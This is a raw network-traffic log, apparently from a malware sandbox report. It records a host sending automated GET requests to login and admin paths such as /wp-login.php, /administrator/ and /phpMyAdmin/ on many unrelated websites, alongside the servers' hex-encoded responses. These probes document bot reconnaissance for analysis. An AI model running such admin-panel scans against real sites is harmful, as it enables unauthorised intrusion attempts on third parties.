Feb 21, 2024 00:26:10.856530905 CET	413	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache Content-Length: 268 Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 62 72 65 65 63 65 74 65 63 68 6e 6f 6c 6f 67 79 2e 63 6f 2e 7a 61 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at breecetechnology.co.za Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
195	192.168.2.6	58258	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.400645018 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.563505888 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
196	192.168.2.6	58259	103.224.182.253	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.400652885 CET	175	OUT	GET /wp-login.php HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.569849968 CET	241	IN	HTTP/1.1 429 Too Many Requests content-length: 117 cache-control: no-cache content-type: text/html connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 32 39 20 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3c 2f 68 31 3e 0a 59 6f 75 20 68 61 76 65 20 73 65 6e 74 20 74 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 20 69 6e 20 61 20 67 69 76 65 6e 20 61 6d 6f 75 6e 74 20 6f 66 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>429 Too Many Requests</h1>You have sent too many requests in a given amount of time.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
197	192.168.2.6	58287	217.160.122.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.429238081 CET	184	OUT	GET /administrator/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.878670931 CET	1286	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:10 GMT Server: Apache X-Powered-By: PHP/7.3.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/" Content-Encoding: gzip Data Raw: 32 35 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d df 72 db b8 92 f7 75 5c 75 de 01 66 76 23 69 47 a4 44 49 fe 27 5b 9e e3 c4 4e c6 33 71 92 cf 72 36 7b 36 49 b9 28 09 92 18 53 a4 86 a4 2c 3b 99 bc c9 56 ed cd 79 86 bd 9a bb bc d8 fe 1a 00 ff 49 b4 4c 39 39 5f 6d 6d 6d 52 b6 25 12 40 37 1a dd 8d 46 77 03 38 d8 3c 7e fd ec e2 6f 6f 4e d8 38 9c 38 87 1b 07 f4 87 f5 1d 2b 08 3a 9a eb e9 9f 02 8d 39 96 3b ea 68 03 ae 1f 9f 68 ec 66 e2 b8 41 7b d8 eb 68 e3 30 9c b6 6b 35 6f 34 35 26 bc e6 06 b5 61 ef 71 f4 de 1a 0c c2 b1 8d 26 54 a1 f9 7c 6e a8 67 46 df 9b d4 c6 dc 99 d6 ac a9 ad 07 53 de d7 18 c1 e5 d6 e0 70 83 b1 83 09 0f 2d d6 1f 5b 7e c0 c3 8e f6 f6 e2 b9 be ab 25 2f 5c 6b c2 3b da b5 cd e7 53 cf 0f 35 d6 f7 dc 90 bb 28 38 b7 01 b1 33 e0 d7 76 9f eb e2 4b 95 d9 ae 1d da 96 a3 07 7d cb e1 1d d3 a8 cb 86 1c db bd 62 3e 77 3a da d4 f7 86 b6 c3 35 36 f6 f9 30 46 76 34 99 8e 0c cf 1f d5 6e 86 6e cd 34 97 2a d9 ee a8 67 f5 af 16 6a 51 17 5d 1e 7e 0e fa 63 d7 9e 06 dc 31 06 bc 06 6a f9 d3 be 31 1d 4f d1 0a f5 2e b4 43 87 1f 76 b9 1d 72 e6 da fd 71 c8 46 7c 38 73 07 dc 65 4f 1e ef 36 4c 73 9f bd 4a 37 c2 06 dc 67 5d af 8f 6e b0 33 3e b0 2d f6 d4 f1 46 07 35 d9 ce c6 41 d0 f7 ed 69 78 38 f0 fa b3 09 e8 60 44 1f 4e 1c 2e be 8b 91 7c 05 a2 b1 0e 8b de dd 5d c8 f0 f9 d4 b1 fa bc ac 86 be aa 61 fc 2b fb 07 35 05 66 e3 20 a6 5d 69 e0 06 fa 14 64 e3 61 7f 5c 92 04 2c d5 6a 79 54 28 b1 1a 06 f8 be 9a 81 31 27 a2 2f 14 d6 2c 27 e4 be 6b 85 18 a4 f0 76 8a b1 b7 a6 53 c7 ee 5b a1 ed b9 35 3f 08 7e 02 89 f1 8a c8 da d1 0a 90 8e 3d f1 ad df 67 de 3e 7b ce f9 a0 c8 10 0e 51 ae a6 65 bb f0 8f c3 ea 37 6f 42 e3 66 f9 7a 51 fc 20 4e 54 03 e2 17 23 fa e8 91 e2 0b 45 b2 90 df 84 b5 4f d6 b5 25 87 11 ac f8 e8 d1 a3 b9 ed 0e bc b9 71 39 9f f2 89 f7 c9 ee f2 30 04 63 07 e0 93 2f 5a cf 0a f8 5b df d1 da 42 7e 83 f6 87 da 87 9a 1a 9f 0f 35 7b 62 8d 78 f0 a1 d6 f7 7c fe a1 26 2a 7f a8 35 8c 86 61 7e a8 ed 34 6e 76 1a 1f 6a 5a 55 03 48 54 37 a6 ee 08 5f 82 eb d1 83 9a 43 3d d1 18 fe 9e c8 f6 f0 89 da f3 66 7e 9f 6b ed 2f 1a e4 1f bc 20 90 50 d8 0a 64 f3 d8 f0 43 6d 3e d5 6d b7 ef cc 06 84 fe 27 fc e0 81 a8 aa 43 1b 70 f4 d9 98 d8 ae f1 29 f8 f9 9a fb 9d 96 b1 63 34 76 b5 af 5f f7 89 5a 9b 10 d2 3e f1 5c 39 ac 5a 55 5e f9 72 6d f9 cc af ba 55 bb ea 75 2c a3 ef 73 60 a1 84 ae ac f5 2d 17 c4 d6 2a 55 a7 e3 19 23 1e 3e 23 2d 75 13 3e 79 92 fe 56 d6 1a 03 08 57 d4 30 eb 97 43 d9 2c 5f 6e 50 0d 5c 65 9f 1b 81 df ef 84 55 0e ed 32 04 96 dc 90 52 b1 38 c4 55 8b e0 2a 84 82 a7 b7 17 d6 88 b4 40 59 23 3d ab 55 de d7 3f 1a 10 24 ee 0e 9e 8d 6d 67 50 e6 95 af 43 cf 2f db 9d 23 df b7 6e cb da d0 b1 88 ce 82 38 2d f4 03 60 67 Data Ascii: 253a}ru\ufv#iGDI'[N3qr6{6I(S,;VyIL99_mmmR%@7Fw8<~ooN88+:9;hhfA{h0k5o45&aq&T\|ngFSp-[~%/\k;S5(83vK}b>w:560Fv4nn4gjQ]~c1j1O.CvrqF\|8seO6LsJ7g]n3>-F5Aix8`DN.\|]a+5f ]ida\,jyT(1'/,'kvS[5?~=g>{Qe7oBfzQ NT#EO%q90c/Z[B~5{bx\|&5a~4nvjZUHT7_C=f~k/ PdCm>m'Cp)c4v_Z>\9ZU^rmUu,s`-U#>#-u>yVW0C,_nP\eU2R8U@Y#=U?$mgPC/#n8-`g
Feb 21, 2024 00:26:10.878700018 CET	1286	IN	Data Raw: 53 d2 b8 41 e7 0b 07 75 6e a1 dd dd 51 7b b3 5e 4d be 9d dc f4 f9 34 7c 8e 9a 78 fe b5 ea 76 ea fb ee 81 6d 38 dc 1d 85 e3 7d f7 a7 9f 2a 49 2b ef ed f7 ee c7 8f 9d a8 ef 71 cf ab 56 a7 1b fa 68 da 18 fa de e4 19 66 81 67 de 80 ef db c3 f2 a6 f3 Data Ascii: SAunQ{^M4\|xvm8}I+qVhfgu\34Tv>?\!'s{41)"16m^gPZCGIIUjnmWw}6]\|[ehpfvMUoUwN}o[A
Feb 21, 2024 00:26:10.878725052 CET	1286	IN	Data Raw: 98 8e d0 13 e4 f4 24 0b d2 f2 73 db 61 82 4f be a7 95 05 d6 8b 4c b7 84 1e 07 9b ba fe de 1e 32 27 64 a7 27 6c ef 23 ac 3a 35 7d d3 3c 9d f6 56 3f d0 52 c3 0c 6e f3 1a 39 d1 b7 82 b1 7d 0d 0f a9 0d df 1c 3e a9 c9 54 cb 99 c3 7f 28 68 78 37 e0 02 Data Ascii: $saOL2'd'l#:5}<V?Rn9}>T(hx7>N_bfYf==#F2,z6qen%z7%\Gaa9a(8m-0Cc,no76mOE1Mm[.
Feb 21, 2024 00:26:10.878762960 CET	1286	IN	Data Raw: 0d a6 e6 45 f9 1a 7d 19 37 b3 05 a4 1c 68 87 dd b7 cf 7e 39 01 0f 37 0f 0f c4 d2 0f 99 68 63 0f ae 54 40 8d 9b 94 8d 88 d7 b1 01 09 42 8a 55 df 6a ff 01 79 26 1f 11 13 d2 df 47 07 c2 2a 4d c5 e1 16 20 68 4c ba 87 91 7e e7 b9 3d 67 e6 77 34 24 41 Data Ascii: E}7h~97hcT@BUjy&GM hL~=gw4$A#STSUR_Kwg1shSf# wKb[lPDF+RDAOSSS<9-RGYX}*GBvAhDg+-H1Ar8"A8YlKM/5NC
Feb 21, 2024 00:26:10.878813028 CET	1286	IN	Data Raw: 4d 17 fb f7 8e 68 11 aa 3d d4 7d 77 27 7e 7a b3 5e bf c1 4f ca 99 a7 91 b3 0b fb 20 35 13 a6 29 9c 09 e4 cd 55 5f 6a 18 57 e5 c4 03 bd 9e 13 8b c2 dd 00 99 40 2f e0 82 78 c5 67 28 0e 8d 7d 8f c3 ce 58 d8 9f 28 7b 28 4d 0a f8 31 68 87 62 4f ec 50 Data Ascii: Mh=}w'~z^O 5)U_jW@/xg(}X({(M1hbOPp.<B>`_M\|~O0RQ,oEVo@8VOUluNB@,=z'GujE,~ yR2%F.G8Ij~DF>qR
Feb 21, 2024 00:26:10.878820896 CET	1286	IN	Data Raw: 79 99 99 b5 e1 b3 a0 99 5b 78 e6 1f 15 1a 4e 25 d8 14 0e 42 e8 71 a4 f7 b8 8d 10 87 f2 23 51 4c 4a 1e bd d5 55 ef b1 c7 c9 4e fc 4c 44 73 f2 7c 12 54 39 93 8b 8f 6b 21 30 e0 b3 10 ab 7e f8 48 06 3a 1c cf 70 d3 8e c2 74 e2 c0 71 f2 9e 4d 66 f0 05 Data Ascii: y[xN%Bq#QLJUNLDs\|T9k!0~H:ptqMfg.\#Kr&\|r(M#r.:]I >+l0-"/&<d-vZM#YG5FC#J8LNL_EN}lfp1"$#!/GB{dNdafHHv82
Feb 21, 2024 00:26:10.878858089 CET	1286	IN	Data Raw: 45 2d 72 43 2d 73 be b9 93 a7 e3 cc 64 ae 28 42 af d8 cf b5 1e 5e 9f 70 42 93 8b b0 5b 18 e6 90 cc 6c e5 0e 64 32 51 14 41 ec 57 09 81 5d 88 cd 54 c5 99 ff 13 02 9d 2e 24 3a 80 a3 2c 0f 37 33 4f a1 99 c9 cc b0 72 38 a5 a1 f6 6b 0a c4 7a 64 73 a0 Data Ascii: E-rC-sd(B^pB[ld2QAW]T.$:,73Or8kzdslk@Gf2^FrQ]ona[9rzoHe#*3q3E'D2@rczE!_j0+(\|`lY-9cLHTkD
Feb 21, 2024 00:26:10.878871918 CET	951	IN	Data Raw: c9 6c 5c cf 29 ce ef 4d d7 65 0c 57 65 94 05 f0 f7 f6 47 dc 25 89 6c be 57 e8 89 41 87 07 dc bc 1e 96 4b 83 e0 77 91 d9 6d 0f 4a 15 b6 d9 61 ba c9 9e 3c 91 4d 53 8d 29 4e ff 72 c3 57 c0 de 80 e1 4f 55 59 07 54 38 42 61 3a 2b 78 f9 5f 0c 2b 55 13 Data Ascii: l\)MeWeG%lWAKwmJa<MS)NrWOUYT8Ba:+x_+Uf!s@yH-$HrC{,e7WEh4QN:!%xvX.=,\^yJ}5S9o\>9LTQwa(aX[EI1K\|VpCxqI-^
Feb 21, 2024 00:26:11.380068064 CET	267	OUT	GET /social-media-acta-ein-paar-fakten/index-php/ HTTP/1.1 Host: www.netzschnipsel.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://www.netzschnipsel.de/administrator/
Feb 21, 2024 00:26:11.933115959 CET	1286	IN	HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=15 Date: Tue, 20 Feb 2024 23:26:11 GMT Server: Apache X-Powered-By: PHP/7.3.33 X-Pingback: http://www.netzschnipsel.de/xmlrpc.php Link: <http://www.netzschnipsel.de/wp-json/>; rel="https://api.w.org/", <http://www.netzschnipsel.de/?p=820>; rel=shortlink Content-Encoding: gzip Data Raw: 33 31 33 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 7d db 72 db 48 92 f6 b5 1d 31 ef 50 82 77 4c 6a 9a 00 08 92 3a 51 a2 3c 92 25 bb 3d 6d d9 1e 49 1e ef ac db c1 00 49 90 84 05 02 6c 00 d4 c1 6e bf c9 44 fc 37 f3 0c 7b 35 77 7e b1 fd b2 0e 38 90 10 05 ca ee 8d de 3f 46 dd 96 48 a0 0e 59 59 59 59 59 79 aa bd b5 a3 d7 4f cf ff fe e6 98 8d e3 89 b7 ff 70 8f fe b0 be 67 47 51 47 f3 03 fd 63 a4 31 cf f6 47 1d 6d e0 e8 47 c7 1a bb 9e 78 7e d4 1e f6 3a da 38 8e a7 6d d3 0c 46 53 63 e2 98 7e 64 0e 7b 8f d4 7b 7b 30 88 c7 2e 9a 90 85 ae ae ae 0c f9 cc e8 07 13 73 ec 78 53 d3 9e ba 7a 34 75 fa 1a a3 7e 1d 7b b0 ff 90 b1 bd 89 13 db ac 3f b6 c3 c8 89 3b da db f3 67 fa b6 96 be f0 ed 89 d3 d1 2e 5d e7 6a 1a 84 b1 c6 fa 81 1f 3b 3e 0a 5e b9 e8 b1 33 70 2e dd be a3 f3 2f 35 e6 fa 6e ec da 9e 1e f5 6d cf e9 58 46 5d 34 e4 b9 fe 05 0b 1d af a3 4d c3 60 e8 7a 8e c6 c6 a1 33 4c 80 1d 4d a6 23 23 08 47 e6 f5 d0 37 2d 6b a1 92 eb 8f 7a 76 ff 62 ae 16 0d d1 77 e2 4f 51 7f ec bb d3 c8 f1 8c 81 63 02 5b e1 b4 6f 4c c7 53 b4 42 a3 8b dd d8 73 f6 5d 7f e0 5c d3 53 f6 f8 d1 76 c3 b2 76 d9 ab 6c 4d 36 70 42 76 16 f4 01 3b 3b 71 06 ae cd 0e bd 60 b4 67 8a ca 0f f7 a2 7e e8 4e e3 fd 41 d0 9f 4d 30 78 43 7d 38 f6 1c fe 9d 4f df 2b 60 8a 75 98 7a 77 7b 21 23 74 a6 9e dd 77 aa 72 be 6b 1a 26 7d 7d 77 cf 94 dd 3c dc 4b 10 56 19 f8 91 3e 05 ae 9c b8 3f ae 08 ac 55 4c b3 68 e8 15 66 62 56 ef aa 19 19 57 84 e9 b9 c2 9a ed c5 4e e8 db 31 66 26 be 99 62 c2 ed e9 d4 73 fb 76 ec 06 be 19 46 d1 0f c0 2b 5e 11 2e 3b 5a 09 d4 b1 c7 a1 fd cb 2c d8 65 cf 1c 67 50 66 de 86 28 67 6a f9 21 fc 76 50 fd 14 4c 68 de ec 50 2f 0b 1f d6 10 d5 c0 9a fb 5f 05 34 a5 db d5 41 8e 38 3d eb 13 a2 67 dd ee c7 b6 ee b8 be 3e b5 31 ea a1 7d 81 45 6c f2 d6 75 ac 8a cc a8 1e 3c 90 d4 2e 09 21 76 ae 63 f3 a3 7d 69 0b e2 c4 aa 7a f0 e0 c1 15 6a 06 57 46 f7 6a ea 4c 82 8f ee 99 13 c7 58 a3 11 a8 ff b3 d6 b3 23 e7 6d e8 69 6d ce 8a a2 f6 cf e6 cf a6 a4 ba 9f 4d 77 62 8f 9c e8 67 b3 1f 84 ce cf 26 af fc b3 d9 30 1a 86 f5 b3 b9 d5 b8 de 6a fc 6c 6a 35 0d 5d a2 ba 31 f5 47 f8 12 5d 8e ee d5 1c ea f1 c6 f0 f7 58 b4 87 4f d4 5e 30 0b fb 8e d6 fe ac 81 95 81 c2 39 10 12 5a 0e 6c d1 e2 fa d9 bc 9a ea ae df f7 66 03 02 ff 23 fe e1 01 af aa 83 b1 39 18 b3 31 71 7d e3 63 f4 e4 d2 09 3b 2d 63 cb 68 6c 6b 5f be ec 12 b6 d6 86 33 bf 4f 2b a9 1a d7 ec 9a b3 fe f9 d2 0e 59 58 f3 6b 6e 2d e8 d8 46 3f 74 00 85 64 25 55 ad 6f fb 40 b6 b6 5e f3 3a 81 31 72 e2 a7 c4 70 af e3 c7 8f b3 df aa 5a 63 00 96 a1 1a 66 fd 6a 2c 9a 75 16 1b 94 13 b7 be eb 18 51 d8 ef c4 35 07 8c 72 08 28 1d 43 ac f5 f9 29 ae d9 d4 af 04 28 3a bc 39 b7 47 c4 db aa 1a 6d 19 da fa fb Data Ascii: 313c}rH1PwLj:Q<%=mIIlnD7{5w~8?FHYYYYYyOpgGQGc1GmGx~:8mFSc~d{{{0.sxSz4u~{?;g.]j;>^3p./5nmXF]4M`z3LM##G7-kzvbwOQc[oLSBs]\SvvlM6pBv;;q`g~NAM0xC}8O+`uzw{!#twrk&}}w<KV>?ULhfbVWN1f&bsvF+^.;Z,egPf(gj!vPLhP/_4A8=g>1}Elu<.!vc}izjWFjLX#mimMwbg&0jlj5]1G]XO^09Zlf#91q}c;-chlk_3O+YXkn-F?td%Uo@^:1rpZcfj,uQ5r(C)(:9Gm
Feb 21, 2024 00:26:11.933129072 CET	1286	IN	Data Raw: fa 07 03 ec c1 f1 07 4f c7 ae 37 a8 3a eb 5f 86 41 58 75 3b 07 61 68 df 54 b5 a1 67 13 9e 39 72 5a 18 07 ba 9d 4d 69 f3 88 3a 9f 1d 60 e7 06 1b 95 3f 6a af d5 6b e9 b7 e3 eb be 33 8d 9f a1 26 9e 7f a9 f9 9d fa ae bf e7 1a 9e e3 8f e2 f1 ae ff c3 Data Ascii: O7:_AXu;ahTg9rZMi:`?jk3&i+5d5sh)6u5_<;wTN<5k7rWN?kZ`,0;tiCMGY1f!6@D[t>TUmln7[}vw}oO
Feb 21, 2024 00:26:11.939074039 CET	1286	IN	Data Raw: 07 dd 88 41 50 77 42 3d c4 ae d9 0b ae 8a c6 5c ff 23 86 fd 99 11 62 a5 9c c2 b0 fb e3 08 48 ff 70 14 dc fd 92 87 8c b0 d4 a0 4a b7 d5 d9 40 1d 56 50 a9 b5 ac 92 85 de 0a 6b 6d 2e ad d5 04 8c 05 5d 6d 2f ad 74 5b 57 56 1d d5 56 1b d5 42 df 7f d6 Data Ascii: APwB=\#bHpJ@VPkm.]m/t[WVVB'y:C<qxatvqVE.QZ`*kVbtLvoie\|coMC1]h$e+!IFh^BBORb5TXs"bP
Feb 21, 2024 00:26:11.939127922 CET	1286	IN	Data Raw: 24 47 87 50 b8 92 81 76 b9 d3 1c 88 8f eb cf 38 1d e2 15 ad 28 5e 43 0e 27 5d 37 64 31 22 3f 34 b5 e6 0a 4b c1 ad 04 7b 59 a6 14 95 2e ac c2 9b 83 9a 6c 30 57 58 34 bf 37 65 12 80 74 ea 70 ba 83 6b 9f f0 2d cc 8c 5b 27 fd 6f 19 ed b7 26 bc f6 c6 Data Ascii: $GPv8(^C']7d1"?4K{Y.l0WX47etpk-['o&0)U)L#Q6g/ziRetNob3j~pz:/&l`GM;W"TC6O\H(E&w^c7J>PI@$?W.

Session ID	Source IP	Source Port	Destination IP	Destination Port
198	192.168.2.6	58486	185.39.146.199	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.504556894 CET	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: markoren.no Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.690855026 CET	109	IN	HTTP/1.1 302 Found content-length: 0 location: https://markoren.no/phpmyadmin/ cache-control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port
199	192.168.2.6	58677	15.197.204.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.529624939 CET	171	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.626575947 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpMyAdmin/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:10.831625938 CET	221	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/phpMyAdmin/ ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port
200	192.168.2.6	58682	13.248.243.5	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.529917955 CET	183	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: strategicimpact.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.637327909 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/phpMyAdmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:10 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:10.843863964 CET	319	IN	HTTP/1.1 301 Moved Permanently location: https://strategicimpact.com.au/phpMyAdmin/ vary: Accept-Encoding server: DPS/2.0.0+sha-c81b86d x-version: c81b86d x-siteid: us-east-1 set-cookie: dps_site_id=us-east-1; path=/ date: Tue, 20 Feb 2024 23:26:10 GMT keep-alive: timeout=5 transfer-encoding: chunked Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
201	192.168.2.6	58424	221.121.158.21	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:10.595345020 CET	238	OUT	GET /administrator/index.php HTTP/1.1 Host: houseguru.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://houseguru.com.au/administrator/
Feb 21, 2024 00:26:10.900140047 CET	1286	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Server: imunify360-webshield/1.21 Last-Modified: Tuesday, 20-Feb-2024 23:26:10 GMT Cache-Control: private, no-store, no-cache, must-revalidate, proxy-revalidate, max-age=0, s-maxage=0 cf-edge-cache: no-cache Data Raw: 35 61 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 74 69 74 6c 65 3e 4f 6e 65 20 6d 6f 6d 65 6e 74 2c 20 70 6c 65 61 73 65 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 36 46 37 46 38 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 30 33 31 33 31 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 34 35 76 68 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 50 6c 65 61 73 65 20 77 61 69 74 20 77 68 69 6c 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 20 69 73 20 62 65 69 6e 67 20 76 65 72 69 66 69 65 64 2e 2e 2e 3c 2f 68 31 3e 0a 3c 66 6f 72 6d 20 69 64 3d 22 77 73 69 64 63 68 6b 2d 66 6f 72 6d 22 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 20 61 63 74 69 6f 6e 3d 22 2f 7a 30 66 37 36 61 31 64 31 34 66 64 32 31 61 38 66 62 35 66 64 30 64 30 33 65 30 66 64 63 33 64 33 63 65 64 61 65 35 32 66 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 69 64 3d 22 77 73 69 64 63 68 6b 22 20 6e 61 6d 65 3d 22 77 73 69 64 63 68 6b 22 2f 3e 0a 3c 2f 66 6f 72 6d 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 77 65 73 74 3d 2b 28 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 5b 5d 29 2b 28 2b 21 2b 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 2b 21 21 5b 5d 29 29 2c 0a 20 20 20 20 20 20 20 20 65 61 73 74 3d 